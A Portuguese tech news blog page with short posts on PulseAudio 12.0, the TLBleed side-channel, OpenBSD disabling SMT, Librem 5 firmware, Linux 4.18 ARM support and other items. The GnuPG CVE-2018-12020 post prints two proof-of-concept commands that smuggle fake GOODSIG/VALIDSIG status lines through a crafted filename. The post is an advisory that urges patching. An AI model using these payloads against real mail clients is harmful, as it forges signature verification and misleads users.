Sem muito alarde a versão 12.0 do PulseAudio foi lançada ontem, este conhecido (e polêmico) software servidor de som open-source.

Dentre as melhorias estão melhores relatórios de latência em perfis Bluetooth A2DP e Apple AirPlay, dispositivos HDMI possuem maior prioridade que saídas SPDIF, suporte para o headset USB Artics 7 da SteelSeries, suporte a caixa de som Dell Thunderbold Dock TB16, corrigido o suporte a entrada digital em placas de som USB, novo cancelador de eco Speex, bindings Vala e uma série de outras melhorias.

Maiores detalhes sobre o PulseAudio 12.0 disponíveis no site do projeto FreeDesktop.org.

Fonte: Phoronix

Add a comment

Vem a tona as primeiras evidências daquilo que o pessoal do OpenBSD já estava prevenindo/prevendo: SMT(Intel HT) é perigoso e gera novos vetores de ataque.

Com mais um daqueles nomes "moderninhos" para exploits, o TLBleed é um ataque side-channel que vaza informações de TLBs. O TLBleed se mostrou confiável sem depender de caches de dados ou instruções tentando trespassar as diversas proteções propostas para os caches de CPU em ataques side-channel. De acordo com Ben Gras, palestrante do evento citado na fonte desta postagem, o TLBleed conseguiu vazar uma chave EdDSA de 256-bit da libgcrypt (usada na GPG por exemplo) com 98% de chance de sucesso após uma única observação do processo de assinatura feito em um corresidente do HyperThread em apenas 17 segundos de análise.

Com o TLBleed também é possível vazar uma chave RSA da libgcrypt utilizando uma tecnologia que envolve machine learning, e esta técnica junto com as falhas que o SMT pode ter aumentará bastante a sofisticação de ataques side-channel no futuro. Nesta apresentação, serão exibidos detalhes da arquitetura, comportamento de TLBs modernas multinível e diversos outros aspectos da microarquitetura da Intel que não são documentados e estarão publicamente disponíveis a partir desta apresentação.

Fonte: Black Hat USA 2018 - TLBleed: When Protecting Your CPU Caches is Not Enough

Add a comment

O OpenBSD está desabilitando o SMT (Simultanious Multi Threading) em instalações padrão, item nos processadores mais conhecido pelo nome comercial da Intel, o HT (Hyper Threading).

Tal solução foi proposta para mitigar futuros ataques similares ao Spectre, já que todas as implementações SMT compartilham a TLB e caches L1 entre as threads. Note que apesar de estar desabilitado nas próximas versões do SO a funcionalidade pode ser trazida ao ar novamente apenas manipulando o parâmetro de kernel hw.smt com o utilitário sysctl.

O impacto de peformance não deverá ser grande, já que isto depende do quão integrada a aplicação é com tecnologias SMT e o load efetivo do equipamento.

Até agora apenas a arquitetura arm64 em processadores Intel será afetada com esta alteração, mas o time do OpenBSD pretende estender esta proteção para outras arquiteturas e fabricantes de hardware.

Fonte: Phoronix

Commit: CVS: cvs.openbsd.org: src

Add a comment

Não conseguindo entregar um telefone 100% Software Livre / Sistema Libre, o smartphone Librem 5 terá um processador secundário para lidar com os blobs binários necessários para a inicialização e para mantê-los longe do bootloader u-Boot e do kernel Linux.

O problema aqui é que para tornar o Librem 5 tão aberto quanto possível alguma atitude precisava ser tomada com as firmwares necessárias para o processo de treinamento da DDR4. Não sendo muito realista a possibilidade da reescrita de firmwares para o DDR4 PHY training, a Purism está planejando o armazenamento destes blobs binários em um processador secundário. Desta forma, eles podem aplicar esta exclusão com a Free Software Foundation enquanto ainda conseguem o selo "Respects Your Freedom" tendo os blobs necessários para o funcionamento.

O SoC i.MX8 tem uma CPU com núcleos Cortex-A53 e um núcleo ARM M4. Enquanto os núcleos do A53 estão envolvidos com o Linux e u-Boot no processo de inicialização o M4 faz a parte do treinamento de memória. Desta forma, o processador A53 permanece "limpo" para os padrões da FSF.

Maiores detalhes sobre o Librem 5 e como eles estão lidando com as firmwares proprietárias no blog Purism.

Fonte: Phoronix

Add a comment

Ben Widawsky, um dos arquitetos de drivers gráficos Linux designado pela Intel e que está a 8 anos no cargo, irá cumprir tarefas com foco no aprimoramento do FreeBSD. Ben continua na Intel mas se afasta do time gráfico Linux para focar no desenvolvimento do FreeBSD. As contribuições de Ben não se limitarão a parte gráfica, e o desenvolvedor estava até buscando freedback de usuários/desenvolvedores para focar as melhorias nas áreas onde o FreeBSD ainda não está maduro o suficiente(segundo seus próprios usuários).

Duas semanas após a primeira postagem no blog de Ben Widawsky, uma segunda postagem foi feita explicando que este time com foco em FreeBSD é novo na Intel e compartilhou as ideias que coletou sobre melhoria.

Dentre os itens priorizados estão suporte a rede Intel 100GbE, melhorias de escalabilidade na NUMA, drivers de vídeo nativos para o FreeBSD(ao invés de drivers DRM portados do Linux), suporte 3D Xpoint, melhorias no gerenciamento de energia, melhorias gerais de segurança/estabilidade, suporte ao pass-through gráfico no FreeBSD, tempo de boot mais rápido, wireless Intel 802.11AC e mais.

Fonte 1: Phoronix

Fonte 2: Phoronix

Add a comment

Seguindo o fiasco da vulnerabilidade EFAIL que envolve formatação HTML em emails para sequestro de dados, temos o CVE-2018-12020.

De acordo com o CVE, o arquivo mainproc.c do GnuPG antes da versão 2.2.8 não trata corretamente o nome do arquivo durante o processo de criptografia e verificação, permitindo que o atacante insira a saída ao GnuPG através do filedescriptor 2 usando o --status-fd 2 . Uma sequência OpenPGP que represente o arquivo original em conjunção com as ações(códigos de status) GOODSIG e VALIDSIG são o suficiente para gerar um ataque válido. O problema foi corrigido nas versões GnuPG 2.2.8, Enigmail 2.0.7, GPGTools 2018.3, e python GnuPG 0.4.3 e a atualização destes softwares é recomendada. Também é uma boa pratica desabilitar o verbose no arquivo de configuração gpg.conf.

POCs:

1

$ echo 'Please send me one of those expensive washing machines.' \
| gpg --armor -r VICTIM_KEYID --encrypt --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig \
\n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\
\n[GNUPG:] TRUST_FULLY 0 classic\
\ngpg: '\'`" > poc1.msg

2

echo "See you at the secret spot tomorrow 10am." | gpg --armor --store --compress-level 0 --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig \
\n[GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01\
\n[GNUPG:] TRUST_FULLY\
\n[GNUPG:] BEGIN_DECRYPTION\
\n[GNUPG:] DECRYPTION_OKAY\
\n[GNUPG:] ENC_TO 50749F1E1C02AB32 1 0\
\ngpg: '\'`" > poc2.msg

Fonte 1: ArsTechnica

Fonte 2: CVE-2018-12020

Add a comment

Diversas empresas estão criando produtos compatíveis com o selo Respects Your Freedom da Free Software Foundation. De uma forma bem simplificada, isto garante que o seu equipamento não te espiona executando tarefas que você não tenha autorizado. Infelizmente os computadores que atendem a estes requisitos possuem um hardware um pouco antigo, e no plano cartesiano das escolhas o usuário precisa abrir mão de performance para ter mais privacidade.

O hacker e amante de liberdade SolidHal está em uma jornada para criar um laptop que atinja os requisitos da FSF para o Respects Your Freedom, dando mais opções para estes usuários. Em seu trabalho ele faz com que o Chromebook Asus C201 marque todos os pontos necessários, instalando o LibreBoot e se livrando de todos os resquícios do Intel Management Engine. Contudo, havia um problema: A WiFi permantente do equipamento precisa de firmware proprietária. Para remediar a situação ele resolveu instalar internamente um adaptador de redes sem fio USB que possui o selo de aprovação da FSF.

Obviamente este equipamento não possuía uma porta USB interna mas SolidHal estudou um pouco e "sacrificou" a conexão da Webcam e após notar como o pinout funcionava,e converteu os fios em uma porta USB usando um pouco de solda. Como o adaptador wifi usb é bastante enxuto, pode ser posicionado nos espaços vagos que a carcaça do notebook possui. Sabemos que este tipo de setup pode gerar ruídos na antena(barreiras físicas e enclausuras de metal), mas são todos preços que os que desejam um hardware livre estão aptos a pagar.

Fonte: HackADay

Fonte da Fonte: Add a usb wifi dongle without losing a usb port (ath9k_htc)

Add a comment

A plataforma ARM bem como seus SoCs receberam uma série de commits que serão aplicados na janela do Linux 4.18. Muita coisa legal vem aí:

  • Suporte a SoC Qualcomm Snapdragon 845 (SDM845) o Kryo 385/845 de 4+4 núcleos atualmente utilizado em dispositivos móveis high-end.
  • Suporte a SoCs Meson 8M2 e Amlogic quad-core Cortex-A9.
  • Suporte a SoC Mediatek MT7623A.
  • Suporte a Renesas R8A77990 / R-Car, SoC com foco em sistemas de entretenimento automotivo.
  • Suporte a STMicroelectronics STM32F469.
  • Driver USB 3.0 OTG adicionado a SoC Rockchip RK3399.

E o suporte a placas conhecidas inclui:

  • Suporte a placa Raspberry Pi 3B+ foi pra mainline do Kernel.
  • Suporte a placa Libre Computer ALL-H3-CC H2+ (SoC Allwinner H2+).
  • Os hardwares NES e Super NES Classic Edition (ambos Allwinner A33) também foram para a mainline.
  • O Valve Steam Link baseado no Berlin2CD teve sua Board DeviceTree adcionada. Isto habilita as interfaces UART, USB, Ethernet, I2C e SDIO. Audio, vídeo e gerenciamento de energia ainda não são suportados. O núcleo gráfico Vivante 3D pode ser inicializado mas não produz saída.
  • Suporte a placa Pocketbeagle(TI AM335X).

Mais detalhes podem ser encontrados no pull request. Até mesmo o Linus se manifestou, afirmando que a adição do Snapdragon 845 poderá alavancar a utilização de notebooks ARM com processadores que "aguentarão o tranco".

Fonte: Phoronix

Add a comment

Na última terça-feira (12), o presidente Michel Temer sancionou a lei 13.674, que  incentiva empresas de informática, comunicação e tecnologia a investirem em pesquisa, desenvolvimento e inovação, recebendo isenções tributárias em retorno.

Foram alterados os textos das leis 8.248, que trata de capacitação e competitividade; e a Lei 8.387, que exigia que empresas apresentassem contrapartida para receber incentivos fiscais. Foi vetado o teto de 20% dos gastos em pesquisa, inovação e desenvolvimento com aquisição, implantação, ampliação ou modernização de infraestrutura física e de laboratórios, pois o presidente entendeu que  "não é razoável que gastos relativos às áreas dedicadas à administração, por não guardarem consonância direta com investimentos em PD&I, sejam ensejadores de incentivo tributário".

Fonte: CanalTech.

Add a comment